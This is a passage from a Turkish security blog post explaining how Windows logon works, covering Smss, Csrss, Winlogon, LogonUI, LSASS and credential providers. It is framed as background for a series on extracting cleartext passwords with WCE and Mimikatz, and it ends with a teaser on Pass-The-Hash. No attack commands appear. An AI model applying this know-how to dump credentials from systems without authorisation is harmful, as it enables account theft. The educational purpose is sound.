yazının ilk başlığında, oturum açma işlemi sırasında önemli rol tutan prosesleri incelenecektir. İkinci başlığında ise, oturum açma işleminin Winlogon prosesine bakan ayağı işlenecektir. Böylece kimlik bilgilerini yazan bir kullanıcının bilgilerinin LSASS prosesine gelene kadarki durumu incelenecektir.</li><li style="text-align: justify;">İkinci yazının ilk başlığında kullanıcı kimlik bilgilerinin LSASS tarafından alınması ve sadece parolanın işlenmesi konusuna değinilecektir. İkinci başlıkta ise, oturumlardaki parolaları açık olarak elde eden 2 aracın (WCE ve Mimikatz) çalışma prensiplerinden ve kullanımından bahsedilecektir. </li></ul><b>Windows İşletim Sisteminde Oturum Açma İşlemi İle İlgili Prosesler</b><br /><div style="text-align: justify;">Windows işletim sisteminde çalışan bir proses çekirdek modu (kernel mode) ve kullanıcı modu (user mode) olmak üzere iki farklı modda çalışabilir. Çekirdek modunda işletim sistemi bileşenleri çalışırken, uygulamalar kullanıcı modunda çalışır. İşletim sistemi bileşenleri yüklendikten sonra, kullanıcı modu ve etkileşimli oturum açma (interactive logon) işlemi başlayabilmektedir.</div><br /><div style="text-align: justify;">Kullanıcıya ait bu modda çalışan ilk proses <b>Smss.exe</b> prosesidir. Ana Smss prosesi her zaman sıfır numaralı etkileşimsiz oturumda bulunur ve başlatılacak olan her bir etkileşimli oturum için bir adet kopya Smss prosesi oluşturur. Oluşturulan kopya Smss prosesi ilgili oturuma ait Csrss ve Winlogon proseslerini oluşturup kendi çalışmasını sonlandırır. Şekil-1'de gösterildiği gibi PID değeri 368 olan Smss kendisinin iki kopyasını oluşturmuştur. 488 ve 624 PID değerlerine sahip olan kopya Smss prosesleri başka prosesleri oluşturduktan sonra sonlanmıştır. Prosesler arasındaki bu ilişki aşağıdaki ekran görüntüsünde görülmektedir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3npOyow0QKwYk6ejBec2URw7IHBulXx7fN2njAmUf3V4-YyDnSu1o119m2Kg-rgblyjnp9l6ukgZ20Voc25imkadSCnQt5k1RqqReP-0pO7onMFK1ZyRQc4PRcWvMuAXvGqRWQnJOaPg/s1600/Wce&Mimikatz_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3npOyow0QKwYk6ejBec2URw7IHBulXx7fN2njAmUf3V4-YyDnSu1o119m2Kg-rgblyjnp9l6ukgZ20Voc25imkadSCnQt5k1RqqReP-0pO7onMFK1ZyRQc4PRcWvMuAXvGqRWQnJOaPg/s400/Wce&Mimikatz_01.jpg" width="400" /></a></div><br />Oturum işlemleri ile ilgili en önemli prosesler aşağıdaki gibidir:<br /><ul><li style="text-align: justify;"><b>Smss.exe (Session Manager Subsystem):</b> Windows işletim sisteminin başlangıç prosesidir. Çevresel değişkenlerin oluşturulması, belirli (HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems altında belirtilen) alt sistemlerin başlatılması, bir takım proseslerin (csrss, wininit, winlogon) başlatılması en temel görevlerindendir.</li><li style="text-align: justify;"><b>Csrss.exe (Client/Server Runtime Subsystem): </b>Thread ve Win32 konsolunun (metinsel arayüz, API kullanımı ile kullanıcı dostu arayüze sahip olunabilir) kontrolünden sorumlu olan prosestir. Temel olarak, kullanıcı modunda gerçekleşen bir çok görevin (task), çekirdek moduna erişmemesini (sistem çağrısının gerçekleştirilmemesini) sağlar.</li><li style="text-align: justify;"><b>Winlogon.exe:</b> İşletim sisteminde oturum açılması ve kapatılması, LogonUI prosesinin oluşturulması, beklenmedik bir şekilde sonlanan LogonUI prosesinin yeniden başlatılması, kimlik doğrulama işlemi için LSASS prosesinin çağırılması, kullanıcı şifresinin değiştirmesi, iş istasyonunun (workstation) kilitlenmesi ve kilitli olan iş istasyonunun tekrardan açılması gibi işlemlerden sorumludur. Winlogon bu görevleri yerine getirirken, yetkisi olmayan başka bir prosesin bu işlemleri okuyamaması, değiştirememesi, kısaca araya girememesini sağlar. Winlogon SYSTEM haklarıyla çalışır, bu sebeple sıfır numaralı oturumda çalışmamaktadır. Windows ortamında etkileşimli her bir oturum için bir adet Winlogon oluşturulur. Sonraki başlıkta biraz daha detaya girilecektir.</li><li style="text-align: justify;"><b>LogonUI.exe:</b> Kimlik bilgisi sağlayıcılarının (credential provider) yüklenmesinden ve oturum değişimi (açma ve kapama işlemleri sırasında) Windows etkileşimli oturum açma grafik arayüzünün gösterilmesinden sorumlu prosestir. Sonraki başlıkta biraz daha detaya girilecektir.</li><li style="text-align: justify;"><b>LSASS.EXE (Local Security Authority Subsystem Service):</b> Kullanıcıların oturum açma işlemleri sırasında kimlik bilgilerini doğruluyan, parola değişikliklerinin gerçekleştirilmesinde görevli olan, kullanıcının yerel güvenlik ilkelerine (security policy) uymaya zorlayan, kullanıcı haklarına göre token oluşturan, göreviyle ilişkili bir olay olduğunda bu olayı Olay Günlüklerine (Event Viewer) yazan prosestir. </li></ul><b>Winlogon ve Windows İşletim Sisteminde Oturum Açma İşlemi</b><br /><div style="text-align: justify;">Windows Vista işletim sistemi öncesinde (Windows XP, Windows Server 2003 gibi), her etkileşimli oturum için Winlogon prosesinin bir örneğini oluşturulurdu. Winlogon prosesi RAM üzerinde kendisine belli bir yer ayırmaktadır. Winlogon, bu yere GINA (Graphical Identification and Authentication) adı verilen DLL (dynamic-link library)’i yüklerdi. GINA da etkileşimli oturumda kimlik doğrulama işlemini gerçekleştirirdi.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxnto5ZJRJfz7V75MIi9MeElJ0-gn8VN_ASQee8IuUsrFeHa9ZKrVpWig8rkSieWLM7Llqm88sMB17-poVmkMXg2uiyTO9vTeWTkmREyuzVEYkBSkDOtjn-rdqGYsZ4SXDfZtJ75HbkU/s1600/Wce%2526Mimikatz_02.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxnto5ZJRJfz7V75MIi9MeElJ0-gn8VN_ASQee8IuUsrFeHa9ZKrVpWig8rkSieWLM7Llqm88sMB17-poVmkMXg2uiyTO9vTeWTkmREyuzVEYkBSkDOtjn-rdqGYsZ4SXDfZtJ75HbkU/s400/Wce%2526Mimikatz_02.gif" width="400" /></a></div><br /><div style="text-align: justify;">Ancak, bu (eski) mimaride Winlogon sıfırıncı (0.) oturumda çalışırdı. Yani kullanıcının açtığı oturum, sistem servislerinin ve kritik diğer proseslerin çalıştığı oturumla aynı oturumda işlem görmekteydi. Ayrıca kullanıcıdan hesap bilgilerini isteyen arayüz 3. taraf bir bileşen olarak kullanılmaktaydı.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlhx-njtCBykNuJN_oCyDF-1MAR2K2UBUuYwWB_Ks6yAzk2yFoHP_ae8BDOvi37kLcsS9yOH2b6onx8S_UEZqGcRVF59ggzHo26pCrITF6jXJbHa-n6rVSz6nrFOMjpTVim-ea8l4rME/s1600/Wce%2526Mimikatz_03.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="371" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlhx-njtCBykNuJN_oCyDF-1MAR2K2UBUuYwWB_Ks6yAzk2yFoHP_ae8BDOvi37kLcsS9yOH2b6onx8S_UEZqGcRVF59ggzHo26pCrITF6jXJbHa-n6rVSz6nrFOMjpTVim-ea8l4rME/s400/Wce%2526Mimikatz_03.gif" width="400" /></a></div><br /><div style="text-align: justify;">Windows Vista işletim sistemi ve sonrasında (Windows 7/8, Windows Server 2008/2008 R2/2012 gibi) oturum açma mimarisi oldukça değişiklik göstermiştir. Yeni mimaride de her oturum için Winlogon prosesinin bir örneği oluşturulur. Ancak bu (yeni) mimaride, etkileşimli oturum direk olarak sıfırıncı (0.) oturumda işlem görmemektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqW3WHifXPu2zTcNbN692Mq0eI6BhPvmhNnrY8DpJg9sVhUQbxTxDiG1f6h6t-RzJpnB9U_OFzvZX_SOG67K6vT_jY9D6IrSVfvRMmDfuovWSqxiK4wjfeN1E0EAImofZi5j4XL2e6LI/s1600/Wce%2526Mimikatz_04.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqW3WHifXPu2zTcNbN692Mq0eI6BhPvmhNnrY8DpJg9sVhUQbxTxDiG1f6h6t-RzJpnB9U_OFzvZX_SOG67K6vT_jY9D6IrSVfvRMmDfuovWSqxiK4wjfeN1E0EAImofZi5j4XL2e6LI/s400/Wce%2526Mimikatz_04.gif" width="400" /></a></div><br /><div style="text-align: justify;">Bu mimari ile sistem ve kullanıcı prosesleri farklı oturumlarda işlem görmeye başlamış, çekirdek için Ram üzerinde ayrılan alana kullanıcı proseslerinin direk erişimi oldukça kısıtlanmıştır.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9CCaiM7SYfeNEyXLxBdBybPpb_M2b_bqQD7djxHQAuNz32YikFcjUaXHx8OUeourLrdYX6-eAphBt8J_TQ7z_BEIhfT2857j-B-LFa_RedLTurpzWbfVELpye7XC5ImpPZSLMB4fJc4/s1600/Wce%2526Mimikatz_05.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9CCaiM7SYfeNEyXLxBdBybPpb_M2b_bqQD7djxHQAuNz32YikFcjUaXHx8OUeourLrdYX6-eAphBt8J_TQ7z_BEIhfT2857j-B-LFa_RedLTurpzWbfVELpye7XC5ImpPZSLMB4fJc4/s400/Wce%2526Mimikatz_05.gif" width="400" /></a></div><br /><div style="text-align: justify;">Yeni mimarideki önemli ikinci değişiklik ise, GINA yerine işletim sistemine gömülü (built-in) olarak gelen ve Winlogon tarafından oluşturulan LogonUI prosesidir. Yani, Winlogon prosesinin bellek alanında DLL kullanılması yerine ayrı bir proses oluşturulmuştur. Aşağıdaki ekran görüntüsü bir numaralı oturum açıkken alınmıştır. Birinci kullanıcı ilk oturum ile etkileşim içerisinde olduğundan dolayı LogonUI prosesinin çalışması sona ermiştir. İki, üç ve dört numaralı kullancııların açtığı iki, üç ve dört numaralı oturumlar açık olmasına rağmen kullanıcılar bu oturumlarla etkileşim halinde olmadığı için bu oturumlara ait LogonUI prosesleri çalışmaya devam eder.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBAskrnjVUSmOcahwP59-pbesQ5VOzl9-nOGukV7dGnKbLavtuttXiOuNxhRHf51Y9Fsn83p-TxsIgPc47m0t_ac2OpIJlHhjaWzfOAq05ED1iSwQVnlYgVhx8glc21A0z8le2Ielej0/s1600/Wce%2526Mimikatz_06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBAskrnjVUSmOcahwP59-pbesQ5VOzl9-nOGukV7dGnKbLavtuttXiOuNxhRHf51Y9Fsn83p-TxsIgPc47m0t_ac2OpIJlHhjaWzfOAq05ED1iSwQVnlYgVhx8glc21A0z8le2Ielej0/s400/Wce%2526Mimikatz_06.jpg" width="400" /></a></div><br /><div style="text-align: justify;">LogonUI adında yeni bir proses oluşturulması sayesinde; kimlik doğrulama işlemi sırasında gerçekleşecek bir hatadan dolayı, Winlogon prosesi (ve tüm sistemin) beklenmedik şekilde sonlanmaması sağlanacaktır. Ayrıca, Winlogon prosesinin bellek alanında harici bir DLL’in kullanılmasından vazgeçilmesi, DLL açıklığından kaynaklı bir kötüye kullanımın da önüne geçmeyi amaçlamaktadır.</div><br /><div style="text-align: justify;">Yeni oturum açma mimarisinde göze çarpan bir iyileştirme de kimlik bilgisi sağlayıcılarıdır (Credential Providers - CP). Kimlik bilgisi sağlayıcıları, LogonUI prosesi tarafından yüklenirler ve Kayıt Defteri’ndeki “HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers” anahtarı altında listelenirler.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKqfdNj0nA5O9ptv0qfTSmKlMABZ_qtFdGb4N5pJipNDOEvs_lPARNxSXU9tkghPOWjg2UC3nzmmdSaEzS4PhPZ9oEp2QUUFxbXTnO-AwfIYMvF01J-7iPhxGG0kusbMkeAW_tASRewkw/s1600/Wce%2526Mimikatz_07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKqfdNj0nA5O9ptv0qfTSmKlMABZ_qtFdGb4N5pJipNDOEvs_lPARNxSXU9tkghPOWjg2UC3nzmmdSaEzS4PhPZ9oEp2QUUFxbXTnO-AwfIYMvF01J-7iPhxGG0kusbMkeAW_tASRewkw/s400/Wce%2526Mimikatz_07.png" width="400" /></a></div><br /><div style="text-align: justify;">Örneğin, GUID değeri “{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}” olan sağlayıcı, varsayılan olarak parola bilgilerini alan sağlayıcıya (PasswordProvider) aittir. Bunun yanında akıllı kartlar, sertifikalar, biyometrik sistemler için de, Wİndows işletim sistemi tarafından kimlik bilgi sağlayıcıları kullanıma sunulmuştur.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Winlogon prosesi, LogonUI prosesini oluşturduğunda, LogonUI prosesi Kayıt Defteri’nden etkin olan kimlik bilgisi sağlayıcılarının listesini alır. Her bir sağlayıcı, LogonUI prosesine ihtiyacı olan arayüz bileşenlerini (metin kutusu, kontrol kutusu, buton vs) belirtir. LogonUI prosesi de bu teleplere uygun olarak bir arayüz oluşturur. Örnek bir arayüz aşağıdaki gibidir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt_1vAvhU7eTClTBbRVWfkCgE39Hg9Q22ViwM2FarKXxMaW3H9ZP0hhjbmXVESmPfagdkuKATAMXCwzwiK91b4eBYmENOiyLFC_rkhnsCW5I3nW3yXpXCYrksFWWwhthsS-WCvJGSLgAM/s1600/Wce%2526Mimikatz_08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt_1vAvhU7eTClTBbRVWfkCgE39Hg9Q22ViwM2FarKXxMaW3H9ZP0hhjbmXVESmPfagdkuKATAMXCwzwiK91b4eBYmENOiyLFC_rkhnsCW5I3nW3yXpXCYrksFWWwhthsS-WCvJGSLgAM/s400/Wce%2526Mimikatz_08.jpg" width="400" /></a></div><br /><div style="text-align: justify;">Kullanıcı karşısına gelen arayüzde kimlik bilgilerini (kullanıcı adı, parola, parmak izi, retina, PIN, sertifika, vs) girer. Kimlik bilgi sağlayıcıları (CP); bu bilgileri alır, özel bir formata koyar (serialization). Daha sonra da, kimlik bilgi sağlayıcıları bu bilgileri, LogonUI prosesi aracılığıyla (veya direk olarak) Winlogon prosesine ulaşır. Winlogon prosesi de bu bilgileri, sıfırıncı oturumda çalışan LSASS prosesine göndererek kimlik doğrulama işleminde aracılık gerçekleştirir.</div><br />Oturum açma konusunda bu zamana dek bahsedilen işlemler aşağıdaki resimde özetlenmiştir.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREc22iKPNRYrVH9F1DOpNVkLYR2sz5IbTIlvF0X0K1MpOr4Uioq1tohmG2WNnBOy4GaYDjLjRybKuTFmr8omQPcozfSVY9jwsbpy4ihqv100XnZVUvmRUjvK244SbcSVZ2grCWHqFG0s/s1600/Wce%2526Mimikatz_09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREc22iKPNRYrVH9F1DOpNVkLYR2sz5IbTIlvF0X0K1MpOr4Uioq1tohmG2WNnBOy4GaYDjLjRybKuTFmr8omQPcozfSVY9jwsbpy4ihqv100XnZVUvmRUjvK244SbcSVZ2grCWHqFG0s/s400/Wce%2526Mimikatz_09.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Özetle, yukarıdaki işlemler sonucunda kimlik bilgileri LSASS.exe prosesine aktarılmış olur. Bu noktadan sonra kimlik doğrulama paketleri (authentication packages) ve kimlik verilerinin tutulduğu veritabanları (SAM dosyası, Aktif Dizin gibi) devreye girer. Bu konular sonraki yazıda ele alınacaktır.</div><br /><b>Kaynaklar: </b><br /><a href="http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html" target="_blank"> http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html </a> <br /><a href="http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx" target="_blank"> http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx </a> <br /><a href="http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx </a> <br /><a href="http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html" target="_blank"> http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html</a><br /><a href="http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html" target="_blank"> http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html </a> <br /><a href="http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx </a> <br /><a href="http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf" target="_blank"> http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf </a> <br /><a href="http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf" target="_blank"> http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf </a> <br /><a href="http://codeidol.com/community/windows/logon/25019/" target="_blank">http://codeidol.com/community/windows/logon/25019/</a><br /><a href="http://fr.slideshare.net/gentilkiwi/mimikatz-asfws" target="_blank"> http://fr.slideshare.net/gentilkiwi/mimikatz-asfws </a> <br /><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/ </a> <br /><a href="http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf" target="_blank"> http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf</a>

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #1

Etki alanı sızma testlerinde ele geçirilen bir bilgisayardan diğer bilgisayarlara yayılma işlemlerinde PTH (Pass-The-Hash) adı verilen yönte...

Read more »